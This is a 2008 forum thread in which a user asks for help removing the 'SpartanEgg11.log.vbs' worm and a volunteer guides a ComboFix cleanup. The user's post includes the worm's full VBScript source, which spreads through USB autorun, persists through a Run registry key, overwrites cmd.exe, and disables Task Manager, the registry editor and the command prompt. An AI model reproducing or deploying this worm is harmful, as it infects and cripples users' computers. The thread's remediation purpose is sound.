|
|
|
SpartanEgg11.log.vbs
|
|
|
donex7
Newbie
|
25. November 2008 @ 23:57 |
Link to this message
|
I don't know what is this (virus, spyware, malware, etc.) but it is on my PC running windows XP. I first noticed this thing when my KIS7 detected it as a trojan but was not able to quarantine or delete it because it reported that "the file does not exist." then it prompted me to roll back the action purportedly done by this trojan, and my PC ran normally.
The next day, my son was playing game on my PC when suddenly it freezes. That's when i discovered that the trojan came back again and was allowed to run by my son (he didn't know of course what it is). I checked KIS7 and there i found out that it is Spartanegg11.log.vbs. I ran a full scan but still it remained 'untreated'. So i copied it's path and ran WinPE. I ran regedit and deleted every occurence of spartanegg11.log.vbs. My PC returns to normal..maybe for now. I don't know if i've done the right thing. I hope so. But this i noticed:
every time i double-click my drives (C&D) i got a message that
spartanegg11.log.vbs is missing and i can't open it this way. Is there a way to fix this? For any help on this, i thank you.
Here's the copy of the SpartanEgg11.log.vbs
'This is just a modified version!
'mabuhay ang Pilipinas!
'Spartan Egg By: Charlie Delta---Bacolod City--April 2008
'Oink...6100 phils.
On Error Resume Next
Dim mydate, myvbsalias, myvbsfile, mysource, winpath, winsyspath, flashdrive,
fs, mycmdfile, cmd, atr, tf, rg, nt, check, sd
mycmdfile = "cmd.exe"
mydate = month(now())
myvbsalias = "SpartanEgg" & mydate
myvbsfile = myvbsalias & ".log.vbs"
atr = "[autorun]" & vbCrLf & _
"shellexecute=wscript.exe " & myvbsfile
Set fs = CreateObject("Scripting.FileSystemObject")
Dim mf, text, size
Set mf = fs.GetFile(WScript.ScriptFullname)
size = mf.size
check = mf.Drive.drivetype
Set text = mf.openastextstream(1, -2)
Do While Not text.atendofstream
mysource = mysource & text.readline
mysource = mysource & vbCrLf
Loop
Do
Set winpath = fs.GetSpecialFolder(0)
Set tf = fs.GetFile(winpath & "\" & myvbsfile)
tf.Attributes = 32
Set tf = fs.CreateTextFile(winpath & "\" & myvbsfile, 2, True)
tf.Write mysource
tf.Close
Set tf = fs.GetFile(winpath & "\" & myvbsfile)
tf.Attributes = 39
If (mydate = "12") Then
Set winsyspath = fs.GetSpecialFolder(1)
cmd = "@echo off" & vbCrLf & _
"wscript " & winpath & "\" & myvbsfile
Set tf = fs.GetFile(winsyspath & "\" & mycmdfile)
tf.Attributes = 32
Set tf = fs.CreateTextFile(winsyspath & "\" & mycmdfile, 2)
tf.Write cmd
tf.Close
End If
dim myday
myday = day(now())& hour(now())& minute(now())
if (myday = "131515") Then
msgbox "13th day on 15:15 hr Cracked!?...By: ©Spartan Egg?"
End If
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And
flashdrive.Path <> "A:" Then
Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)
tf.Attributes = 32
Set tf = fs.CreateTextFile(flashdrive.Path & "\" & myvbsfile, 2, True)
tf.Write mysource
tf.Close
Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)
tf.Attributes = 39
Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")
tf.Attributes = 32
Set tf = fs.CreateTextFile(flashdrive.Path & "\autorun.inf", 2, True)
tf.Write atr
tf.Close
Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")
tf.Attributes = 39
End If
Next
Set rg = CreateObject("WScript.Shell")
rg.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Di
sableRegistryTools", 1, "REG_DWORD"
rg.RegWrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSConfig",
winpath & "\" & myvbsfile
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Window Title", "Hacked By: © Spartan Egg?...6100 phils.!mabuhay
ang Pilipinas!"
rg.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Di
sableTaskMgr", 1, "REG_DWORD"
rg.RegWrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
\Folder\Hidden\SHOWALL\CheckedValue", 0, "REG_DWORD"
rg.RegWrite
"HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD", 1,
"REG_DWORD"
If check <> 1 Then
WScript.sleep 8000
End If
Loop While (check <> 1)
Set sd = CreateObject("WScript.Shell")
sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname
|
|
Advertisement
|
 |
|
|
Senior Member
|
26. November 2008 @ 04:48 |
Link to this message
|
Hey donex7
Now, please download ComboFix.
With ComboFix, at the download window, please rename it to Combo-Fix(.exe) before downloading it. Save it to your Desktop.
Please disable all security programs, such as antiviruses, antispywares, and firewalls.
? Run Combo-Fix.exe and follow the prompts.
? Accept the End-User License Agreement.
? Allow the Recovery Console to be installed.
? When you see the window below, click on Yes.
? When the Recovery Console has been installed, click on Yes to start the scan.
**Understand that things like your system clock changing and your desktop disappearing might happen. Do not worry, because all will be restored later.
? Wait for the scan to be fully completed.
? If it requires a reboot, please do so.
? After the scan has completed entirely, please post the log here. The log will be located at C:\ComboFix(.txt)
Do not click on the ComoboFix window, as it may cause it to stall.
Best Regards :D
Life is but a dream; you dont feel any pain unless you want to or you fall off the bed.
Success is relative; the more success the more relatives.
A computer once beat me at chess, but it was no match for me at kickboxing.
To be or not to be; thats a dumb question.
|
|
donex7
Newbie
|
27. November 2008 @ 18:15 |
Link to this message
|
Hello cdavfrew,
Thank you for taking time helping me out of this trouble. I just finished doing what you said. I suspect that i got this SpartanEgg11.log.vbs from my workplace because my flash drive is infected. When i inserted it last night KIS7 deteceted it once again but still was not able to delete it but rollback the action of this virus/malware. I already reformatted my flash drive.
Here's the log of Combofix:
ComboFix 08-11-27.01 - Donex 2008-11-27 22:07:26.1 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.1332 [GMT -8:00]
Running from: D:\Malware Tool\Combo-Fix.exe
* Created a new restore point
WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
C:\autorun.inf
D:\Autorun.inf
.
((((((((((((((((((((((((( Files Created from 2008-10-28 to 2008-11-28 )))))))))))))))))))))))))))))))
.
2008-11-27 22:09 . 2008-11-27 22:10 114 -rahs---- C:\autorun.inf
2008-11-27 21:07 . 2008-11-27 22:10 7,056 -rahs---- C:\WINDOWS\SpartanEgg11.log.vbs
2008-11-27 21:07 . 2008-11-27 22:10 7,056 -rahs---- C:\SpartanEgg11.log.vbs
2008-11-26 20:19 . 2008-11-26 20:19 68,096 --a------ C:\WINDOWS\ScUnin.exe
2008-11-26 20:19 . 2008-11-26 20:20 12,265 --a------ C:\WINDOWS\scunin.dat
2008-11-26 20:19 . 2008-11-26 20:19 967 --a------ C:\WINDOWS\ScUnin.pif
2008-11-26 20:18 . 2008-11-27 19:54 <DIR> d-------- C:\Program Files\Starcraft
2008-11-26 08:57 . 2008-11-26 08:57 <DIR> d-------- C:\Program Files\inKline Global
2008-11-26 08:55 . 2008-11-26 08:55 <DIR> d-------- C:\Documents and Settings\Donex\Application Data\Media Player Classic
2008-11-26 08:53 . 2008-11-26 08:53 <DIR> d-------- C:\Program Files\Foxit Software
2008-11-26 08:44 . 2008-11-26 08:44 <DIR> d-------- C:\Program Files\K-Lite Codec Pack
2008-11-26 08:34 . 2008-11-26 08:34 <DIR> d--hs---- C:\Diskeeper
2008-11-26 08:23 . 2008-11-26 08:23 <DIR> d-------- C:\Program Files\Diskeeper Corporation
2008-11-26 07:59 . 2008-11-26 08:08 <DIR> d-------- C:\Program Files\Winamp
2008-11-26 07:59 . 2005-12-04 21:12 20,640 --------- C:\WINDOWS\system32\drivers\PxHelp20.sys
2008-11-26 07:55 . 2008-11-26 07:55 <DIR> d-------- C:\WINDOWS\Modio
2008-11-26 07:55 . 2002-01-29 04:28 220,432 -ra------ C:\WINDOWS\system32\drivers\slntamr.sys
2008-11-26 07:55 . 2002-01-29 04:28 220,432 --a--c--- C:\WINDOWS\system32\dllcache\slntamr.sys
2008-11-26 07:55 . 2001-11-29 08:10 33,028 -ra------ C:\WINDOWS\system32\drivers\slwdmsup.sys
2008-11-26 07:55 . 2001-11-29 08:10 33,028 --a--c--- C:\WINDOWS\system32\dllcache\slwdmsup.sys
2008-11-26 07:55 . 2001-08-17 13:57 16,128 --a------ C:\WINDOWS\system32\drivers\MODEMCSA.sys
2008-11-26 07:55 . 2001-08-17 13:57 16,128 --a--c--- C:\WINDOWS\system32\dllcache\modemcsa.sys
2008-11-25 22:13 . 2008-11-25 22:13 <DIR> d-------- C:\Documents and Settings\Donex\Application Data\ATI
2008-11-25 22:13 . 2008-11-25 22:13 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\ATI
2008-11-25 22:02 . 2008-11-25 22:02 <DIR> d-------- C:\Documents and Settings\Administrator
2008-11-24 21:56 . 2005-04-15 10:58 1,351,392 --a------ C:\WINDOWS\system32\COMCTL32.OCX
2008-11-24 21:56 . 2007-03-12 07:16 1,146,184 --a------ C:\WINDOWS\system32\FM20.DLL
2008-11-24 21:56 . 2005-04-15 10:58 1,071,088 --a------ C:\WINDOWS\system32\MSCOMCTL.OCX
2008-11-24 21:56 . 2007-03-12 07:16 212,240 --a------ C:\WINDOWS\system32\RICHTX32.OCX
2008-11-24 21:56 . 2007-03-12 07:16 152,848 --a------ C:\WINDOWS\system32\COMDLG32.OCX
2008-11-24 21:56 . 2007-03-12 07:16 40,960 --a------ C:\WINDOWS\system32\SSUBTMR6.DLL
2008-11-24 21:56 . 2007-03-12 07:16 32,584 --a------ C:\WINDOWS\system32\FM20ENU.DLL
2008-11-24 21:56 . 2007-03-12 07:16 10,752 --a------ C:\WINDOWS\system32\aamd532.dll
2008-11-24 21:47 . 2008-11-24 21:56 <DIR> d-------- C:\Program Files\AutoPatcher
2008-11-24 21:06 . 2008-11-24 21:57 <DIR> d-------- C:\XP Auto Patcher
2008-11-24 21:03 . 2008-11-24 21:04 <DIR> d-------- C:\XP Drivers
2008-11-24 14:32 . 2004-08-03 23:08 31,616 --a------ C:\WINDOWS\system32\drivers\usbccgp.sys
2008-11-24 14:32 . 2004-08-03 23:08 31,616 --a--c--- C:\WINDOWS\system32\dllcache\usbccgp.sys
2008-11-24 14:29 . 2008-11-24 14:29 <DIR> d-------- C:\Program Files\Malwarebytes' Anti-Malware
2008-11-24 14:29 . 2008-11-24 14:29 <DIR> d-------- C:\Documents and Settings\Donex\Application Data\Malwarebytes
2008-11-24 14:29 . 2008-11-24 14:29 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Malwarebytes
2008-11-24 14:29 . 2008-10-22 16:10 38,496 --a------ C:\WINDOWS\system32\drivers\mbamswissarmy.sys
2008-11-24 14:29 . 2008-10-22 16:10 15,504 --a------ C:\WINDOWS\system32\drivers\mbam.sys
2008-11-24 14:26 . 2008-11-24 14:26 <DIR> d-------- C:\WINDOWS\system32\SupportAppXL
2008-11-24 14:26 . 2008-11-26 10:28 <DIR> d-------- C:\Program Files\SMART BRO
2008-11-24 14:26 . 2008-03-18 16:12 105,088 --a------ C:\WINDOWS\system32\drivers\ZTEusbser6k.sys
2008-11-24 14:26 . 2008-03-18 16:12 105,088 --a------ C:\WINDOWS\system32\drivers\ZTEusbnmeaext.sys
2008-11-24 14:26 . 2008-03-18 16:12 105,088 --a------ C:\WINDOWS\system32\drivers\ZTEusbnmea.sys
2008-11-24 14:26 . 2008-03-18 16:12 105,088 --a------ C:\WINDOWS\system32\drivers\ZTEusbmdm6k.sys
2008-11-24 14:25 . 2004-08-03 23:08 26,496 --a--c--- C:\WINDOWS\system32\dllcache\usbstor.sys
2008-11-24 14:08 . 2008-11-24 14:08 <DIR> d-------- C:\Program Files\Kaspersky Lab
2008-11-24 14:08 . 2008-11-27 19:55 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Kaspersky Lab
2008-11-24 14:08 . 2008-11-27 22:10 2,406,688 --ahs---- C:\WINDOWS\system32\drivers\fidbox.dat
2008-11-24 14:08 . 2008-11-24 18:11 96,976 --a------ C:\WINDOWS\system32\drivers\klin.dat
2008-11-24 14:08 . 2008-11-24 18:11 87,855 --a------ C:\WINDOWS\system32\drivers\klick.dat
2008-11-24 14:08 . 2008-11-27 22:09 51,488 --ahs---- C:\WINDOWS\system32\drivers\fidbox2.dat
2008-11-24 14:08 . 2008-11-27 22:09 35,276 --ahs---- C:\WINDOWS\system32\drivers\fidbox.idx
2008-11-24 14:08 . 2008-11-27 22:09 6,824 --ahs---- C:\WINDOWS\system32\drivers\fidbox2.idx
2008-11-24 14:07 . 2008-11-24 14:07 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Kaspersky Lab Setup Files
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-11-26 16:57 --------- d--h--w C:\Program Files\InstallShield Installation Information
2008-11-25 02:11 112,144 ----a-w C:\WINDOWS\system32\drivers\kl1.sys
2008-11-24 21:42 315,392 ----a-w C:\WINDOWS\HideWin.exe
2008-11-24 21:42 --------- d-----w C:\Program Files\Realtek
2008-11-24 21:40 --------- d-----w C:\Program Files\ATI Technologies
2008-11-24 21:39 --------- d-----w C:\Program Files\Common Files\ATI Technologies
2008-11-24 21:32 --------- d-----w C:\Program Files\Common Files\InstallShield
2008-11-24 21:15 --------- d-----w C:\Program Files\microsoft frontpage
2008-09-16 00:14 3,596,288 ----a-w C:\WINDOWS\system32\qt-dx331.dll
2008-09-16 00:12 81,920 ----a-w C:\WINDOWS\system32\dpl100.dll
2008-09-16 00:11 683,520 ----a-w C:\WINDOWS\system32\divx.dll
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"="C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2008-01-21 12:17 61440]
"Malwarebytes' Anti-Malware"="C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe" [2008-10-22 16:10 399504]
"DiskeeperSystray"="C:\Program Files\Diskeeper Corporation\Diskeeper\DkIcon.exe" [2006-10-04 12:38 163840]
"MSConfig"="C:\WINDOWS\SpartanEgg11.log.vbs" [2008-11-27 22:11 7056]
"AVP"="C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 7.0\avp.exe" [2008-02-08 18:36 227856]
"RTHDCPL"="RTHDCPL.EXE" [2008-02-18 23:34 16858112 C:\WINDOWS\RTHDCPL.exe]
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Reboot.exe [2006-12-29 02:35:16 409088]
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system]
"DisableRegistryTools"= 1 (0x1)
"DisableTaskMgr"= 1 (0x1)
[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify"=dword:00000001
"UpdatesDisableNotify"=dword:00000001
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\KasperskyAntiVirus]
"DisableMonitoring"=dword:00000001
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
R2 Autorun CDROM Monitor;Autorun CDROM Monitor;C:\WINDOWS\system32\SupportAppXL\cdrom_mon.exe [2008-11-24 14:26:04 81920]
R2 MBAMService;MBAMService;"C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe" [2008-11-24 14:29:16 170640]
R3 AtiHdmiService;ATI Function Driver for HDMI Service;C:\WINDOWS\system32\drivers\AtiHdmi.sys [2008-11-24 13:34:28 84992]
R3 klim5;Kaspersky Anti-Virus NDIS Filter;C:\WINDOWS\system32\DRIVERS\klim5.sys [2007-12-13 13:28:40 24592]
R3 MBAMProtector;MBAMProtector;\??\C:\WINDOWS\system32\drivers\mbam.sys [2008-11-24 14:29:17 15504]
S3 V90drv;v90drv;C:\WINDOWS\system32\DRIVERS\v90drv.sys [2001-11-29 08:10:32 1432836]
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{aad10dfe-ba74-11dd-b6ff-001e90b232a0}]
\Shell\AutoRun\command - F:\AutoRun.exe
|
Senior Member
|
29. November 2008 @ 09:16 |
Link to this message
|
Hey donex7
Sorry for the late reply...
Please disable all security programs, such as antiviruses, antispywares, and firewalls.
Also disable your internet connection.
Open Notepad and copy/paste the text in the code box below into it:
File::
C:\autorun.inf
C:\WINDOWS\SpartanEgg11.log.vbs
C:\SpartanEgg11.log.vbs
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Reboot.exe
Registry::
[-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{aad10dfe-ba74-11dd-b6ff-001e90b232a0}]
? Save this as CFScript.txt in the same folder as ComboFix.
? Then drag the CFScript.txt into Combo-Fix.exe.
? This will start ComboFix again. After reboot, (in case it asks to reboot), post the ComboFix log here. The log will be located at C:\ComboFix(.txt).
Do not click on the ComoboFix window, as it may cause it to stall.
Any more problems?
Best Regards :D
Life is but a dream; you dont feel any pain unless you want to or you fall off the bed.
Success is relative; the more success the more relatives.
A computer once beat me at chess, but it was no match for me at kickboxing.
To be or not to be; thats a dumb question.
|
|
donex7
Newbie
|
30. November 2008 @ 16:37 |
Link to this message
|
|
To cdavfrew,
My PC is clean now after i've done all what you said. I did not bother to post the log here anymore as it only reported it deleted Spartanegg11.log.vbs in Drive C, C\WINDOWS, also deleted Reboot.exe and the mountpoints2 autorun...that's all.
I've tried to access the following:
run command, task manager,DOS, and yes i can already access all of them which i am not able to when Spartanegg11.log.vbs was still in command. I can also reset the attributes of the folders/files now to hidden or shown..before it is always hidden.
And most of all, my PC speed has returned to normal. No more freezing/delaying time. Now what can i say? It's a big, big thanks to you..
My best regards..
|
Senior Member
|
30. November 2008 @ 22:37 |
Link to this message
|
Hey donex7
Glad to hear that your problem is fixed, and there's really no need for the ComboFix log anymore.
However, I'd like you to follow one final instruction:
Find this folder, C:\Qoobox, zip it up, and upload it to http://www.uploadmalware.com/
Best Regards :D
Life is but a dream; you dont feel any pain unless you want to or you fall off the bed.
Success is relative; the more success the more relatives.
A computer once beat me at chess, but it was no match for me at kickboxing.
To be or not to be; thats a dumb question.
|
|
Advertisement
|
|
|
|
donex7
Newbie
|
11. December 2008 @ 23:37 |
Link to this message
|
|
To cdavfre,
sorry for the delayed response. just want to thank you again and to let you know that i've uploaded already the requested file to the link you provided.
all the best..
|
|
